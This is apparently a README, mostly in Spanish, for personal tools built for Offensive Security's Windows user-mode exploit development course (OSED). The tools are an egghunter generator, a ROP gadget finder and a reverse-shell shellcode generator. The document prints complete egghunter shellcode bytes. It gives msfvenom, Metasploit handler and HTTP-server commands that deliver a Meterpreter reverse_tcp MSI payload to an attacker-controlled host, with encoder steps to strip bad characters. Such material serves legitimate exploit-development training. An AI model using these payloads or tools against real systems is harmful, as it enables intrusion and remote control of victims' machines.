
herramientas personalizadas para el curso Windows Usermode Exploit Dev de Offensive Security (OSED)
herramientas a medida para el curso de desarrollo de exploits de Windows en modo usuario de Offensive Security (OSED)
pip3 install keystone-engine numpy
requiere keystone-engine
usage: egghunter.py [-h] [-t TAG] [-b BAD_CHARS [BAD_CHARS ...]] [-s]
Creates an egghunter compatible with the OSED lab VM
optional arguments:
-h, --help show this help message and exit
-t TAG, --tag TAG tag for which the egghunter will search (default: c0d3)
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to check for in final egghunter (default: 00)
-s, --seh create an seh based egghunter instead of NtAccessCheckAndAuditAlarm
generar el egghunter por defecto
./egghunter.py
[+] egghunter created!
[=] len: 35 bytes
[=] tag: c0d3c0d3
[=] ver: NtAccessCheckAndAuditAlarm
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x63\x30\x64\x33\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
generar un egghunter con la etiqueta w00tw00t
./egghunter.py --tag w00t
[+] egghunter created!
[=] len: 35 bytes
[=] tag: w00tw00t
[=] ver: NtAccessCheckAndAuditAlarm
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x77\x30\x30\x74\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
generar un egghunter basado en SEH mientras se comprueban los bad chars (no altera el shellcode, eso debe hacerse manualmente)
./egghunter.py -b 00 0a 25 26 3d --seh
[+] egghunter created!
[=] len: 69 bytes
[=] tag: c0d3c0d3
[=] ver: SEH
egghunter = b"\xeb\x2a\x59\xb8\x63\x30\x64\x33\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3"
Encuentra y categoriza gadgets útiles. Solo imprime en la terminal los gadgets más limpios disponibles (cantidad mínima de basura entre lo que se busca y la instrucción ret final). Todos los gadgets se escriben en un archivo de texto para búsquedas posteriores.
hoy (3 de junio de 2021) descubrí que ropper (y también ROPGadget) no logra encontrar un gadget que rp++ sí encuentra (esto me dificultó el desafío #2, ya que había un gadget add que ropper simplemente no veía).
Debido a que find-gadgets usa la API de ropper, actualicé find-gadgets para que también incluya los gadgets de rp++. Actualmente, los gadgets de rp++ que ropper no encontró se agregan al archivo de “todos los gadgets” (found-gadgets.txt por defecto), y no se categorizan en el archivo de “gadgets limpios” (found-gadgets.txt.clean por defecto). Así que la cobertura está, solo que no está bien integrada. Puede que lo revise o no y haga que la salida de rp++ también quede categorizada.
usage: find-gadgets.py [-h] -f FILES [FILES ...] [-b BAD_CHARS [BAD_CHARS ...]] [-o OUTPUT]
Searches for clean, categorized gadgets from a given list of files
optional arguments:
-h, --help show this help message and exit
-f FILES [FILES ...], --files FILES [FILES ...]
space separated list of files from which to pull gadgets (optionally, add base address (libspp.dll:0x10000000))
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to omit from gadgets, e.g., 00 0a (default: empty)
-o OUTPUT, --output OUTPUT
name of output file where all (uncategorized) gadgets are written (default: found-gadgets.txt)
buscar gadgets en múltiples archivos (uno está cargado en un offset diferente al que prefiere la dll) y omitir 0x0a y 0x0d de todos los gadgets

requiere keystone-engine
Crea una reverse shell con cargador msi opcional
usage: shellcode.py [-h] [-l LHOST] [-p LPORT] [-b BAD_CHARS [BAD_CHARS ...]] [-m] [-d] [-t] [-s]
Creates shellcodes compatible with the OSED lab VM
optional arguments:
-h, --help show this help message and exit
-l LHOST, --lhost LHOST
listening attacker system (default: 127.0.0.1)
-p LPORT, --lport LPORT
listening port of the attacker system (default: 4444)
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to check for in final egghunter (default: 00)
-m, --msi use an msf msi exploit stager (short)
-d, --debug-break add a software breakpoint as the first shellcode instruction
-t, --test-shellcode test the shellcode on the system
-s, --store-shellcode
store the shellcode in binary format in the file shellcode.bin
❯ python3 shellcode.py --msi -l 192.168.49.88 -s
[+] shellcode created!
[=] len: 251 bytes
[=] lhost: 192.168.49.88
[=] lport: 4444
[=] break: breakpoint disabled
[=] ver: MSI stager
[=] Shellcode stored in: shellcode.bin
[=] help:
Create msi payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.88 LPORT=443 -f msi -o X
Start http server (hosting the msi file):
sudo python -m SimpleHTTPServer 4444
Start the metasploit listener:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.49.88; set LPORT 443; exploit"
Remove bad chars with msfvenom (use --store-shellcode flag):
cat shellcode.bin | msfvenom --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python -v shellcode